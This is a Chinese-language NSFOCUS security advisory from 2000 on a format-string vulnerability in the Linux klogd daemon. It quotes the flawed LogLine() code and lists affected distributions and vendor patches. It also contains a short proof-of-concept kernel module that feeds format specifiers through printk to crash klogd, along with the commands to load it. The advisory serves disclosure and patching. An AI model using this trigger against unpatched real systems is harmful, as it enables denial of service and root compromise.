安全研究
安全漏洞
Linux klogd 格式串安全漏洞
发布日期:2000-09-20
更新日期:2000-09-20
受影响系统:
描述:
Connectiva Linux 5.x
Connectiva Linux 4.x
Corel Linux OS 1.0
Debian Linux 2.x
Immunix OS 6.2
MandrakeSoft Linux Mandrake 7.1
MandrakeSoft Linux Mandrake 7.0
MandrakeSoft Linux Mandrake 6.1
MandrakeSoft Linux Mandrake 6.0
RedHat Linux 6.x
RedHat Linux 5.2
S.u.S.E. Linux 7.x
S.u.S.E. Linux 6.x
Slackware Linux 7.1
Slackware Linux 7.0
Slackware Linux 4.0
Trustix Secure Linux 1.x
Turbo Linux 6.0.x
Turbo Linux 4.4
klogd 是一个Linux系统守护进程,它接收来自内核的消息,并将它们送给syslogd加以记录。
在klogd中存在一些格式串漏洞,可能导致攻击者获取本地root权限。在某些情况下,远程
获取root权限也是可能的。这个问题在于klogd直接将包含用户输入的数据传送给了syslog().
有问题的代码在klogd.c 的LogLine()函数中:
LogLine(char *ptr, int len) :
(...)
if( space == 0 ) /* line buffer is full */
{
/*
** Line too long. Start a new line.
*/
*line = 0; /* force null terminator */
if ( debugging )
{
fputs("Line buffer full:\n", stderr);
fprintf(stderr, "\tLine: %s\n", line);
}
Syslog( LOG_INFO, line_buff ); <--- 有问题的代码
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
line = line_buff;
space = sizeof(line_buff)-1;
parse_state = PARSING_TEXT;
}
(...)
if( *ptr == '\n' ) /* newline */
{
*line++ = *ptr++; /* copy it in */
space -= 1;
len -= 1;
*line = 0; /* force null terminator */
Syslog( LOG_INFO, line_buff ); <--- 有问题的代码
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
line = line_buff;
space = sizeof(line_buff)-1;
break;
}
if( *ptr == '[' )
(...)
尽管LogLine()函数检查了"%"字符以避免出现格式串问题,但是在处理'[<'和'>]'对之间的
字符串时,klogd忘记进行检查了。因此,如果用户可以导致内核产生一个包含[<%s %s %s %s>]
的消息,就能使klogd发生段错误并且崩溃。攻击者也可能利用格式串执行任意代码。
攻击者必须利用某些设备驱动程序(例如/dev/mixer),系统调用(例如 connect()),内核模块
或者其他应用程序(例如knfsd),产生包含用户指定的任意字符串的内核信息,才有可能攻击成功。
<*来源: Maurycy Prodeus (z33d@eth-security.net)
Jouko Pynn鰊en (jouko@solutions.fi)
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Maurycy Prodeus提供了一个测试程序:
-> test.c <-
#define __KERNEL__
#define MODULE
#include <linux/version.h>
#include <sys/syscall.h>
#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/types.h>
#include <linux/unistd.h>
#include <linux/fs.h>
#include <linux/sched.h>
#include <asm/segment.h>
#include <asm/desc.h>
int init_module(void)
{
// printk("[<%%.2019dAAAA\n");
printk("[<%%p%%p%%p>\n");
return 0;
}
int cleanup_module(void)
{
return 0;
}
<---
# gcc test.c -c -Wall -O2;insmod test;tail /var/log/messages
建议:
临时解决办法:
NSFOCUS建议您再没有打补丁或者升级之前,暂时停止klogd服务。
厂商补丁:
很多Linux厂商都已经提供了自己的补丁/升级程序:
[ Red Hat Linux 5.2 ]:
sparc:
ftp://updates.redhat.com/5.2/sparc/sysklogd-1.3.31-1.6.sparc.rpm
alpha:
ftp://updates.redhat.com/5.2/alpha/sysklogd-1.3.31-1.6.alpha.rpm
i386:
ftp://updates.redhat.com/5.2/i386/sysklogd-1.3.31-1.6.i386.rpm
sources:
ftp://updates.redhat.com/5.2/SRPMS/sysklogd-1.3.31-1.6.src.rpm
[ Red Hat Linux 6.2 ]:
sparc:
ftp://updates.redhat.com/6.2/sparc/sysklogd-1.3.31-17.sparc.rpm
i386:
ftp://updates.redhat.com/6.2/i386/sysklogd-1.3.31-17.i386.rpm
alpha:
ftp://updates.redhat.com/6.2/alpha/sysklogd-1.3.31-17.alpha.rpm
sources:
ftp://updates.redhat.com/6.2/SRPMS/sysklogd-1.3.31-17.src.rpm
[ Slackware ]
ftp://ftp.slackware.com/pub/slackware/slackware-current/slakware/a1/sysklogd.tgz
[ Debian GNU/Linux 2.1 (alias slink) ]
- ----------------------------------
Source archives:
http://security.debian.org/dists/slink/updates/source/sysklogd_1.3.orig.tar.gz
http://security.debian.org/dists/slink/updates/source/sysklogd_1.3-31.slink1.diff.gz
http://security.debian.org/dists/slink/updates/source/sysklogd_1.3-31.slink1.dsc
Intel :
http://security.debian.org/dists/slink/updates/binary-i386/sysklogd_1.3-31.slink1_i386.deb
[ Debian GNU/Linux 2.2 (alias potato) ]
- -----------------------------------
Source archives:
http://security.debian.org/dists/potato/updates/main/source/sysklogd_1.3-33.1.diff.gz
http://security.debian.org/dists/potato/updates/main/source/sysklogd_1.3-33.1.dsc
http://security.debian.org/dists/potato/updates/main/source/sysklogd_1.3.orig.tar.gz
Alpha:
http://security.debian.org/dists/potato/updates/main/binary-alpha/sysklogd_1.3-33.1_alpha.deb
ARM:
http://security.debian.org/dists/potato/updates/main/binary-arm/sysklogd_1.3-33.1_arm.deb
Intel:
http://security.debian.org/dists/potato/updates/main/binary-i386/sysklogd_1.3-33.1_i386.deb
Sun Sparc:
http://security.debian.org/dists/potato/updates/main/binary-sparc/sysklogd_1.3-33.1_sparc.deb
[ Linux-Mandrake 6.0: ]
ftp://ftp.free.fr/pub/Distributions_Linux/Mandrake/updates/6.0/RPMS/sysklogd-1.3.31-14mdk.i586.rpm
ftp://ftp.free.fr/pub/Distributions_Linux/Mandrake/updates/6.0/SRPMS/sysklogd-1.3.31-14mdk.src.rpm
Linux-Mandrake 6.1:
ftp://ftp.free.fr/pub/Distributions_Linux/Mandrake/updates/6.1/RPMS/sysklogd-1.3.31-14mdk.i586.rpm
ftp://ftp.free.fr/pub/Distributions_Linux/Mandrake/updates/6.1/SRPMS/sysklogd-1.3.31-14mdk.src.rpm
Linux-Mandrake 7.0:
ftp://ftp.free.fr/pub/Distributions_Linux/Mandrake/updates/7.0/RPMS/sysklogd-1.3.31-15mdk.i586.rpm
ftp://ftp.free.fr/pub/Distributions_Linux/Mandrake/updates/7.0/SRPMS/sysklogd-1.3.31-15mdk.src.rpm
Linux-Mandrake 7.1:
ftp://ftp.free.fr/pub/Distributions_Linux/Mandrake/updates/7.1/RPMS/sysklogd-1.3.31-15mdk.i586.rpm
ftp://ftp.free.fr/pub/Distributions_Linux/Mandrake/updates/7.1/SRPMS/sysklogd-1.3.31-15mdk.src.rpm
[ Conectiva ]
ftp://atualizacoes.conectiva.com.br/4.0/SRPMS/sysklogd-1.4-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.0/i386/sysklogd-1.4-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/SRPMS/sysklogd-1.4-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/i386/sysklogd-1.4-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/SRPMS/sysklogd-1.4-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/sysklogd-1.4-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/SRPMS/sysklogd-1.4-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/sysklogd-1.4-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/SRPMS/sysklogd-1.4-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/sysklogd-1.4-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/SRPMS/sysklogd-1.4-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/sysklogd-1.4-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/SRPMS/sysklogd-1.4-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/sysklogd-1.4-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/SRPMS/sysklogd-1.4-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/sysklogd-1.4-1cl.i386.rpm
[ Immunix OS 6.2 ]
http://immunix.org:8080/ImmunixOS/6.2/updates/RPMS/sysklogd-1.3.31-17_StackGuard.i386.rpm
http://www.immunix.org:8080/ImmunixOS/6.2/updates/SRPMS/sysklogd-1.3.31-17_StackGuard.src.rpm
[ TurboLinux ]
ftp://ftp.turbolinux.com/pub/updates/6.0/sysklogd-1.3.31-6.i386.rpm
ftp://ftp.turbolinux.com/pub/updates/6.0/SRPMS/sysklogd-1.3.31-6.src.rpm
[ Trustix ]
ftp://ftp.trustix.com/pub/Trustix/updates/1.1/RPMS/sysklogd-1.3.31-18tr.i586.rpm
浏览次数:8061
严重程度:0(网友投票)
绿盟科技给您安全的保障